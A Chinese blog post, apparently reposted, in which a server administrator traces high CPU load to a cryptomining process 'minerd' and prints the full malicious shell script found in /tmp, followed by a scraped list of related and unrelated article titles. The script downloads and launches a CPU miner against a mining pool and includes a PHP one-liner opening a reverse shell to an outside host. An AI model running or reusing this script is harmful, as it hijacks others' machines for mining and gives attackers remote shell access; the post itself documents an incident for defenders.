关于‘挖矿’minerd
今天服务器cpu使用率一直很高,而且是nice高,说明是一些低优先级的进程占用了大量的cpu,经过排查发先了minerd这个进程
以服务器的/tmp目录下找到了源头。。。。。一个简单的脚本:
1 Cpunum=`cat /proc/cpuinfo |grep 'processor'|wc -l`; 2 echo "cpu-number $Cpunum"; 3 4 function random() 5 { 6 min=$1; 7 max=$2-$1; 8 num=$(date +%s+%N); 9 ((retnum=num%max+min)); 10 echo $retnum; 11 } 12 13 function down(){ 14 rm -rf /tmp/minerd 15 rm -rf /tmp/pooler.tar.gz 16 Bits=`getconf LONG_BIT`; 17 echo $Bits; 18 if [ $Bits -eq 64 ]; 19 then 20 echo "is 64 bit"; 21 url='http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86_64.tar.gz' 22 elif [ $Bits -eq 32 ]; 23 then 24 echo "is 32 bit"; 25 url='http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz' 26 fi 27 echo $url 28 if [ -f /tmp/minerd ]; 29 then 30 echo "minerd File exists" 31 #cd /tmp/ 32 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x 33 else 34 if [ -f /tmp/pooler.tar.gz ]; 35 then 36 rm -rf /tmp/pooler.tar.gz 37 fi 38 if [ `which wget` ]; 39 then 40 echo "wget is ok." 41 downtools=`wget -O /tmp/pooler.tar.gz $url` 42 elif [ `which curl` ]; 43 then 44 echo "curl is ok." 45 downtools=`curl -o /tmp/pooler.tar.gz $url` 46 fi 47 cd /tmp/ 48 tar zxvf pooler.tar.gz 49 rm -rf /tmp/pooler.tar.gz 50 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x 51 fi 52 53 } 54 function run(){ 55 out=$(random 1 100); 56 echo $out 57 Isopen=`php -r '$sock=@fsockopen("multi.ghash.io",3333);exec("/bin/sh -i <&3 >&3 2>&3");if ($sock) {echo "ok";}'` 58 59 if [ $Isopen ]; 60 then 61 echo "connt prot 3333 ok" 62 cd /tmp 63 ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker$out -p x 64 else 65 echo "connt 186 host pool 80" 66 cd /tmp 67 ./minerd -a scrypt -o stratum+tcp://106.186.118.162:80 -u lscllc.worker1 -p x 68 69 fi 70 } 71 72 process=`pgrep minerd` 73 74 #echo $process 75 76 if [ $process ]; 77 then 78 echo "find minerd ok start kill $process" 79 kill $process 80 run 81 else 82 echo "not find minerd process" 83 down 84 run 85 fi
转载于:https://www.cnblogs.com/xuxyblog/p/3856446.html
关于‘挖矿’minerd相关推荐
- 服务器被挖矿minerd***的解决办法
千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个解决minerd并不是最终目的,主要是查找问题来源.解决问题思路1.打开防火墙,添加规则,关闭挖矿minerd的访问 ipt ...
- 阿里云服务器被挖矿minerd入侵的解决办法,导致tomcat启动很慢
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似, ...
- 【解决阿里云服务器提示挖矿程序风险2022】
解决阿里云服务器提示挖矿程序风险2022-10 搜索删除含system-private相关的所有文件 如图:system-private.... 2.清除定时任务 3.修改文件可执行权限 4.清除路由 ...
- redis在容器里连接不上_Redis服务器被劫持风波,服务器相关知识共享学习
俗话说安全猛于虎,之前多多少少有所小体会:这次的上线Redis服务器被劫严重影响了开发测试和线上环境,在解决的过程也对安全方面了解了很多:总结了这次过程的排查流程以及采取的相应测试,在此与大家共享. ...
- Redis服务器被劫持风波
强烈推荐一个大神的人工智能的教程:http://www.captainbed.net/zhanghan [前言] 俗话说全猛于虎,之前多多少少有所小体会:这次的上线Redis服务器被劫严重影响了开发测 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
- 阿里云服务器被挖矿病毒minerd***的解决方法
早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
- 关于服务被挖矿程序minerd入侵解决方法
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序, ...
- 清除挖矿脚本 minerd
症状:cup占用率飙高 原因:这次入侵是由于redis没有设置用户名密码,没有限制访问ip导致 解决方法: ps -eopcpu,args --sort=%cpu|head 找到飙高的程序是mi ...
最新文章
- ×××linux下samba服务器
- SecureCRT通过密钥进行SSH登录
- 苏州飘“彩云” 五年规模破百亿元
- 【Python爬虫学习笔记12】Ajax数据爬取简介
- cv mat的shape_将ndarray转换为cv::Mat的最简单方法是什么?
- IMP-00041: 警告: 创建的对象带有编译警告解决办法
- 两台服务器建立信任关系(root,普通用户)
- 【codevs1039】01年noip TG--数的划分满分dp+愚蠢深搜+pas的奇怪做法
- 【Elasticsearch】一次 排查 iK 分词器 查询慢 分词多 内容大 的问题记录
- 再见!经典版Edge!
- input隐藏边框、设置透明背景色
- 《百度中小学人工智能课程》预计9月进课堂;AI医疗市场未来营收规模或达万亿以上...
- trie树模板(前缀树)
- Error:Execution failed for task ':recordlib:lint'. Lint found errors in the project; aborting buil
- 手机的 32K,26M时钟电路作用 (转载于 52rd zsqt8888的专栏)
- OCR学习之一:OCR简介
- [Copy] Netlink Socket
- c语言本地函数声明非法,C++本地函数定义是非法的
- 本周AI热点回顾:何恺明RegNet超越EfficientNet、数学难题“abc猜想”封印终被开启、微软麻将 AI 论文发布
- web of science 2022新版检索证明pdf下载方法
热门文章
- 关于react上线系列问题及解决方案
- 【Linux】X window与文本模式的切换
- URL重写,asp.net URL重写,URLRewriter.dll下载
- 《WF编程》系列之4 - 漫游工作流:Widows Workflow Runtime及其服务
- Python version 3.3 required, which was not found in the registry
- [Unity3D]自己动手重制坦克舰队ArmadaTank
- 清除windows的EFS加密
- 正则表达式匹配NOD用户名与密码
- 百余篇SCI文章的一字经验----短
- Quicktime:如何在录制屏幕时录制系统声音